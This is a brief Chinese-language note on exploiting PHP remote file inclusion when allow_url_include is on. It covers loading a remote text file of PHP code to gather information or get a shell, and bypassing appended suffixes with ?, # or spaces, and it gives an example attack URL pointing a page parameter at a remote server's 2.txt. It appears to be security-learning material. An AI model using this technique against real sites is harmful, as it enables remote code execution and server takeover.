PHP的配置选项allow_url_include为ON,则include/require函数可以加载远程文件
远程包含含有php代码的txt文件,服务器进行解析后执行相关操作收集信息或getshell 当进行有限制的远程文件包含漏洞时,例如包含文件同时在文件名后加后缀html,则可以用?#和空格等绕过(fuzz大法好)
http://127.0.0.1/index.php?page=http://远程服务器ip/2.txt